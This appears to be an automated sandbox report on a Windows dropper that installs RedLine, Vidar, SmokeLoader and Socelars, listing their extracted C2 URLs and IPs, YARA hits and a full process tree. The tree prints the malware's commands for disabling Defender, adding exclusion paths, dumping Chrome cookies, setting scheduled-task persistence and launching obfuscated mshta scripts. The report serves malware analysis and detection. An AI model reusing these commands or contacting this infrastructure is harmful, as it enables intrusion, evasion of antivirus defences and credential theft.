Analysis
-
max time kernel
41s -
max time network
157s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
23/12/2021, 13:27
Static task
static1
Behavioral task
behavioral1
Sample
2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe
Resource
win7-en-20211208
General
-
Target
2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe
-
Size
7.0MB
-
MD5
e3377587921b08dbf82f1c517c46c771
-
SHA1
d6a64cfc0d0965a2138c1711db9068c05edbbf99
-
SHA256
2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e
-
SHA512
a35bc53bb085406e65258fd9493c447b1b555fb292b8629832d23a49f55cb8c684c19c601187bc1062b19405d3260773874f98fb0338d8f82e612efc127a869e
Malware Config
Extracted
socelars
http://www.biohazardgraphics.com/
Extracted
vidar
49.2
915
https://mstdn.social/@kipriauk9
https://qoto.org/@kipriauk8
-
profile_id
915
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
media22ns
65.108.69.168:13293
Extracted
redline
userv1
159.69.246.184:13127
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 736 2264 rundll32.exe 128 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
resource yara_rule behavioral2/memory/5108-311-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/5108-313-0x0000000000419336-mapping.dmp family_redline behavioral2/memory/1268-312-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1268-314-0x000000000041932A-mapping.dmp family_redline behavioral2/memory/5108-316-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1268-315-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/5108-317-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1268-318-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1096-414-0x0000000000EE0000-0x00000000010A8000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000200000001ab59-173.dat family_socelars behavioral2/files/0x000200000001ab59-218.dat family_socelars -
NirSoft WebBrowserPassView 5 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/files/0x000200000001ab5b-148.dat WebBrowserPassView behavioral2/files/0x000200000001ab5b-206.dat WebBrowserPassView behavioral2/memory/4460-288-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView behavioral2/files/0x000800000001ab48-289.dat WebBrowserPassView behavioral2/files/0x000800000001ab48-287.dat WebBrowserPassView -
Nirsoft 8 IoCs
resource yara_rule behavioral2/files/0x000200000001ab5b-148.dat Nirsoft behavioral2/files/0x000200000001ab5b-206.dat Nirsoft behavioral2/memory/1032-256-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral2/files/0x000600000001ab44-254.dat Nirsoft behavioral2/files/0x000600000001ab44-255.dat Nirsoft behavioral2/memory/4460-288-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral2/files/0x000800000001ab48-289.dat Nirsoft behavioral2/files/0x000800000001ab48-287.dat Nirsoft -
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/4872-264-0x0000000000DA0000-0x0000000000E75000-memory.dmp family_vidar behavioral2/memory/4872-266-0x0000000000400000-0x00000000008B2000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000500000001ab46-122.dat aspack_v212_v242 behavioral2/files/0x000500000001ab46-125.dat aspack_v212_v242 behavioral2/files/0x000500000001ab48-127.dat aspack_v212_v242 behavioral2/files/0x000500000001ab48-129.dat aspack_v212_v242 behavioral2/files/0x000500000001ab45-123.dat aspack_v212_v242 behavioral2/files/0x000500000001ab45-130.dat aspack_v212_v242 behavioral2/files/0x000500000001ab45-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 23 IoCs
pid Process 4568 setup_installer.exe 4612 setup_install.exe 1716 Thu0483c35fbf3ec8d.exe 2700 Thu045bf6b666088d.exe 2588 Thu0431d38e2544.exe 3244 Thu0496e1dd7fba63.exe 1868 Thu04eef50b2b35a1.exe 5056 Thu04ab2fb4f7.exe 4312 Thu04115bb33998ce.exe 5116 Thu0431d38e2544.exe 1144 Thu0442fc62eeb857aca.exe 2128 Thu0460219468fd5c220.exe 816 Thu047d85274a427.exe 2244 Thu04fb797f99fe7dae8.exe 2268 Thu04a1df34ace0e8.exe 4872 Thu04865988bc.exe 1816 Thu0496e1dd7fba63.exe 4824 Thu046f48ffab4707f.exe 1592 Thu04c109370946a.exe 896 Thu04c109370946a.tmp 1568 Thu04c109370946a.exe 1032 11111.exe 5104 Thu04c109370946a.tmp -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 8 IoCs
pid Process 4612 setup_install.exe 4612 setup_install.exe 4612 setup_install.exe 4612 setup_install.exe 4612 setup_install.exe 4612 setup_install.exe 896 Thu04c109370946a.tmp 5104 Thu04c109370946a.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com 68 ipinfo.io 69 ipinfo.io 181 ipinfo.io 182 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3244 set thread context of 1816 3244 Thu0496e1dd7fba63.exe 103 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
pid pid_target Process procid_target 3752 1868 WerFault.exe 94 2120 2208 WerFault.exe 143 3576 4840 WerFault.exe 147 5624 4840 WerFault.exe 147 5872 2296 WerFault.exe 155 5892 4840 WerFault.exe 147 3148 4840 WerFault.exe 147 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu04115bb33998ce.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu04115bb33998ce.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu04115bb33998ce.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5800 schtasks.exe 5180 schtasks.exe 5132 schtasks.exe 5836 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5824 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 3996 taskkill.exe 2792 taskkill.exe 2448 taskkill.exe 1100 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings Thu04fb797f99fe7dae8.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 4312 Thu04115bb33998ce.exe 4312 Thu04115bb33998ce.exe 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 2024 Process not Found 4972 powershell.exe 4972 powershell.exe 792 powershell.exe 792 powershell.exe 2024 Process not Found 2024 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4312 Thu04115bb33998ce.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
description pid Process Token: SeDebugPrivilege 1716 Thu0483c35fbf3ec8d.exe Token: SeCreateTokenPrivilege 4824 Thu046f48ffab4707f.exe Token: SeAssignPrimaryTokenPrivilege 4824 Thu046f48ffab4707f.exe Token: SeLockMemoryPrivilege 4824 Thu046f48ffab4707f.exe Token: SeIncreaseQuotaPrivilege 4824 Thu046f48ffab4707f.exe Token: SeMachineAccountPrivilege 4824 Thu046f48ffab4707f.exe Token: SeTcbPrivilege 4824 Thu046f48ffab4707f.exe Token: SeSecurityPrivilege 4824 Thu046f48ffab4707f.exe Token: SeTakeOwnershipPrivilege 4824 Thu046f48ffab4707f.exe Token: SeLoadDriverPrivilege 4824 Thu046f48ffab4707f.exe Token: SeSystemProfilePrivilege 4824 Thu046f48ffab4707f.exe Token: SeSystemtimePrivilege 4824 Thu046f48ffab4707f.exe Token: SeProfSingleProcessPrivilege 4824 Thu046f48ffab4707f.exe Token: SeIncBasePriorityPrivilege 4824 Thu046f48ffab4707f.exe Token: SeCreatePagefilePrivilege 4824 Thu046f48ffab4707f.exe Token: SeCreatePermanentPrivilege 4824 Thu046f48ffab4707f.exe Token: SeBackupPrivilege 4824 Thu046f48ffab4707f.exe Token: SeRestorePrivilege 4824 Thu046f48ffab4707f.exe Token: SeShutdownPrivilege 4824 Thu046f48ffab4707f.exe Token: SeDebugPrivilege 4824 Thu046f48ffab4707f.exe Token: SeAuditPrivilege 4824 Thu046f48ffab4707f.exe Token: SeSystemEnvironmentPrivilege 4824 Thu046f48ffab4707f.exe Token: SeChangeNotifyPrivilege 4824 Thu046f48ffab4707f.exe Token: SeRemoteShutdownPrivilege 4824 Thu046f48ffab4707f.exe Token: SeUndockPrivilege 4824 Thu046f48ffab4707f.exe Token: SeSyncAgentPrivilege 4824 Thu046f48ffab4707f.exe Token: SeEnableDelegationPrivilege 4824 Thu046f48ffab4707f.exe Token: SeManageVolumePrivilege 4824 Thu046f48ffab4707f.exe Token: SeImpersonatePrivilege 4824 Thu046f48ffab4707f.exe Token: SeCreateGlobalPrivilege 4824 Thu046f48ffab4707f.exe Token: 31 4824 Thu046f48ffab4707f.exe Token: 32 4824 Thu046f48ffab4707f.exe Token: 33 4824 Thu046f48ffab4707f.exe Token: 34 4824 Thu046f48ffab4707f.exe Token: 35 4824 Thu046f48ffab4707f.exe Token: SeDebugPrivilege 1868 Thu04eef50b2b35a1.exe Token: SeDebugPrivilege 2700 Thu045bf6b666088d.exe Token: SeDebugPrivilege 2128 Thu0460219468fd5c220.exe Token: SeDebugPrivilege 792 powershell.exe Token: SeDebugPrivilege 4972 powershell.exe Token: SeShutdownPrivilege 2024 Process not Found Token: SeCreatePagefilePrivilege 2024 Process not Found Token: SeShutdownPrivilege 2024 Process not Found Token: SeCreatePagefilePrivilege 2024 Process not Found Token: SeShutdownPrivilege 2024 Process not Found Token: SeCreatePagefilePrivilege 2024 Process not Found Token: SeShutdownPrivilege 2024 Process not Found Token: SeCreatePagefilePrivilege 2024 Process not Found Token: SeShutdownPrivilege 2024 Process not Found Token: SeCreatePagefilePrivilege 2024 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3980 wrote to memory of 4568 3980 2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe 69 PID 3980 wrote to memory of 4568 3980 2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe 69 PID 3980 wrote to memory of 4568 3980 2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe 69 PID 4568 wrote to memory of 4612 4568 setup_installer.exe 70 PID 4568 wrote to memory of 4612 4568 setup_installer.exe 70 PID 4568 wrote to memory of 4612 4568 setup_installer.exe 70 PID 4612 wrote to memory of 592 4612 setup_install.exe 73 PID 4612 wrote to memory of 592 4612 setup_install.exe 73 PID 4612 wrote to memory of 592 4612 setup_install.exe 73 PID 4612 wrote to memory of 648 4612 setup_install.exe 74 PID 4612 wrote to memory of 648 4612 setup_install.exe 74 PID 4612 wrote to memory of 648 4612 setup_install.exe 74 PID 4612 wrote to memory of 912 4612 setup_install.exe 75 PID 4612 wrote to memory of 912 4612 setup_install.exe 75 PID 4612 wrote to memory of 912 4612 setup_install.exe 75 PID 4612 wrote to memory of 920 4612 setup_install.exe 76 PID 4612 wrote to memory of 920 4612 setup_install.exe 76 PID 4612 wrote to memory of 920 4612 setup_install.exe 76 PID 4612 wrote to memory of 416 4612 setup_install.exe 77 PID 4612 wrote to memory of 416 4612 setup_install.exe 77 PID 4612 wrote to memory of 416 4612 setup_install.exe 77 PID 4612 wrote to memory of 1096 4612 setup_install.exe 85 PID 4612 wrote to memory of 1096 4612 setup_install.exe 85 PID 4612 wrote to memory of 1096 4612 setup_install.exe 85 PID 4612 wrote to memory of 1188 4612 setup_install.exe 84 PID 4612 wrote to memory of 1188 4612 setup_install.exe 84 PID 4612 wrote to memory of 1188 4612 setup_install.exe 84 PID 4612 wrote to memory of 1304 4612 setup_install.exe 83 PID 4612 wrote to memory of 1304 4612 setup_install.exe 83 PID 4612 wrote to memory of 1304 4612 setup_install.exe 83 PID 4612 wrote to memory of 1452 4612 setup_install.exe 78 PID 4612 wrote to memory of 1452 4612 setup_install.exe 78 PID 4612 wrote to memory of 1452 4612 setup_install.exe 78 PID 4612 wrote to memory of 1528 4612 setup_install.exe 82 PID 4612 wrote to memory of 1528 4612 setup_install.exe 82 PID 4612 wrote to memory of 1528 4612 setup_install.exe 82 PID 4612 wrote to memory of 1640 4612 setup_install.exe 79 PID 4612 wrote to memory of 1640 4612 setup_install.exe 79 PID 4612 wrote to memory of 1640 4612 setup_install.exe 79 PID 4612 wrote to memory of 1744 4612 setup_install.exe 80 PID 4612 wrote to memory of 1744 4612 setup_install.exe 80 PID 4612 wrote to memory of 1744 4612 setup_install.exe 80 PID 4612 wrote to memory of 1992 4612 setup_install.exe 86 PID 4612 wrote to memory of 1992 4612 setup_install.exe 86 PID 4612 wrote to memory of 1992 4612 setup_install.exe 86 PID 1304 wrote to memory of 1716 1304 cmd.exe 81 PID 1304 wrote to memory of 1716 1304 cmd.exe 81 PID 4612 wrote to memory of 2192 4612 setup_install.exe 90 PID 4612 wrote to memory of 2192 4612 setup_install.exe 90 PID 4612 wrote to memory of 2192 4612 setup_install.exe 90 PID 4612 wrote to memory of 3064 4612 setup_install.exe 89 PID 4612 wrote to memory of 3064 4612 setup_install.exe 89 PID 4612 wrote to memory of 3064 4612 setup_install.exe 89 PID 4612 wrote to memory of 2552 4612 setup_install.exe 87 PID 4612 wrote to memory of 2552 4612 setup_install.exe 87 PID 4612 wrote to memory of 2552 4612 setup_install.exe 87 PID 4612 wrote to memory of 2628 4612 setup_install.exe 88 PID 4612 wrote to memory of 2628 4612 setup_install.exe 88 PID 4612 wrote to memory of 2628 4612 setup_install.exe 88 PID 920 wrote to memory of 2700 920 cmd.exe 91 PID 920 wrote to memory of 2700 920 cmd.exe 91 PID 920 wrote to memory of 2700 920 cmd.exe 91 PID 1096 wrote to memory of 2588 1096 cmd.exe 92 PID 1096 wrote to memory of 2588 1096 cmd.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe"C:\Users\Admin\AppData\Local\Temp\2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:648
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0496e1dd7fba63.exe /mixtwo4⤵PID:912
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0496e1dd7fba63.exeThu0496e1dd7fba63.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3244 -
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0496e1dd7fba63.exeThu0496e1dd7fba63.exe /mixtwo6⤵
- Executes dropped EXE
PID:1816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu0496e1dd7fba63.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0496e1dd7fba63.exe" & exit7⤵PID:3696
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu0496e1dd7fba63.exe" /f8⤵
- Kills process with taskkill
PID:3996
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu045bf6b666088d.exe4⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu045bf6b666088d.exeThu045bf6b666088d.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu045bf6b666088d.exeC:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu045bf6b666088d.exe6⤵PID:5108
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu047d85274a427.exe4⤵PID:416
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu047d85274a427.exeThu047d85274a427.exe5⤵
- Executes dropped EXE
PID:816 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:1032
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:4460
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu04ab2fb4f7.exe4⤵PID:1452
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04ab2fb4f7.exeThu04ab2fb4f7.exe5⤵
- Executes dropped EXE
PID:5056 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\c33Ko.Cpl",6⤵PID:4436
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\c33Ko.Cpl",7⤵PID:1856
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu04a1df34ace0e8.exe4⤵PID:1640
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04a1df34ace0e8.exeThu04a1df34ace0e8.exe5⤵
- Executes dropped EXE
PID:2268 -
C:\Users\Admin\Pictures\Adobe Films\Bl5loTl_xiDJNDk_xTItNPZR.exe"C:\Users\Admin\Pictures\Adobe Films\Bl5loTl_xiDJNDk_xTItNPZR.exe"6⤵PID:3608
-
-
C:\Users\Admin\Pictures\Adobe Films\xCVvs7awf52bSGamC2Wt9DPh.exe"C:\Users\Admin\Pictures\Adobe Films\xCVvs7awf52bSGamC2Wt9DPh.exe"6⤵PID:3416
-
-
C:\Users\Admin\Pictures\Adobe Films\Y8hC_G5w_clPe8qICnhQoLsv.exe"C:\Users\Admin\Pictures\Adobe Films\Y8hC_G5w_clPe8qICnhQoLsv.exe"6⤵PID:1076
-
-
C:\Users\Admin\Pictures\Adobe Films\x52Xk9FRHgDwZQxtBLLTkXJJ.exe"C:\Users\Admin\Pictures\Adobe Films\x52Xk9FRHgDwZQxtBLLTkXJJ.exe"6⤵PID:4040
-
-
C:\Users\Admin\Pictures\Adobe Films\AYd49CGpQeBTxMgdogAX4TYS.exe"C:\Users\Admin\Pictures\Adobe Films\AYd49CGpQeBTxMgdogAX4TYS.exe"6⤵PID:4544
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5800
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GYUx2tBb67yYwGAoFuaWSNlU.exe"C:\Users\Admin\Pictures\Adobe Films\GYUx2tBb67yYwGAoFuaWSNlU.exe"6⤵PID:2208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 4007⤵
- Program crash
PID:2120
-
-
-
C:\Users\Admin\Pictures\Adobe Films\INFdyWeCZdxZObhbTUTxiAdo.exe"C:\Users\Admin\Pictures\Adobe Films\INFdyWeCZdxZObhbTUTxiAdo.exe"6⤵PID:4344
-
-
C:\Users\Admin\Pictures\Adobe Films\MEAA4p1r97nCLqnOjuIxrcki.exe"C:\Users\Admin\Pictures\Adobe Films\MEAA4p1r97nCLqnOjuIxrcki.exe"6⤵PID:4840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 6727⤵
- Program crash
PID:3576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 6847⤵
- Program crash
PID:5624
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 6487⤵
- Program crash
PID:5892
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 6687⤵
- Program crash
PID:3148
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cLg5SfP8AquFer9H4wY0M_LY.exe"C:\Users\Admin\Pictures\Adobe Films\cLg5SfP8AquFer9H4wY0M_LY.exe"6⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5208
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:2740
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4EZaxftHta_RFEA4myCwD0uY.exe"C:\Users\Admin\Pictures\Adobe Films\4EZaxftHta_RFEA4myCwD0uY.exe"6⤵PID:1096
-
-
C:\Users\Admin\Pictures\Adobe Films\VbAuk35mcwW237YlXGOkq6K4.exe"C:\Users\Admin\Pictures\Adobe Films\VbAuk35mcwW237YlXGOkq6K4.exe"6⤵PID:3780
-
-
C:\Users\Admin\Pictures\Adobe Films\pQBiwmaZ36vXPb1pX9YfKvHY.exe"C:\Users\Admin\Pictures\Adobe Films\pQBiwmaZ36vXPb1pX9YfKvHY.exe"6⤵PID:4468
-
-
C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe"C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe"6⤵PID:2424
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )7⤵PID:5240
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe"> ..\ZCJQBxDe1bLl.exE &&staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If ""== "" for %e In ("C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe" ) do taskkill /iM "%~Nxe" -f8⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe9⤵PID:5968
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If ""/pVxJDYWtOoH4fPZQYK~Ihe ""== """" for %e In (""C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )10⤵PID:3644
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE"> ..\ZCJQBxDe1bLl.exE &&staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If "/pVxJDYWtOoH4fPZQYK~Ihe "== "" for %e In ("C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE" ) do taskkill /iM "%~Nxe" -f11⤵PID:5508
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "XTn5tUJNThnFCkfnfJcZ35ST.exe" -f9⤵
- Kills process with taskkill
PID:1100
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nIzHekt5Vbyd8gXBX7H_cOzM.exe"C:\Users\Admin\Pictures\Adobe Films\nIzHekt5Vbyd8gXBX7H_cOzM.exe"6⤵PID:4908
-
-
C:\Users\Admin\Pictures\Adobe Films\6lJC3uCPAhGou38QLiTXZqbR.exe"C:\Users\Admin\Pictures\Adobe Films\6lJC3uCPAhGou38QLiTXZqbR.exe"6⤵PID:4848
-
-
C:\Users\Admin\Pictures\Adobe Films\Ip6tK0xgMi2oNhi6oDqz_sCI.exe"C:\Users\Admin\Pictures\Adobe Films\Ip6tK0xgMi2oNhi6oDqz_sCI.exe"6⤵PID:2296
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2296 -s 19887⤵
- Program crash
PID:5872
-
-
-
C:\Users\Admin\Pictures\Adobe Films\MbgAcLdW8UI82y6TXPhr1Hm1.exe"C:\Users\Admin\Pictures\Adobe Films\MbgAcLdW8UI82y6TXPhr1Hm1.exe"6⤵PID:5028
-
-
C:\Users\Admin\Pictures\Adobe Films\ReJrALRxoqE2IptwcUpyca7d.exe"C:\Users\Admin\Pictures\Adobe Films\ReJrALRxoqE2IptwcUpyca7d.exe"6⤵PID:2164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵PID:6092
-
-
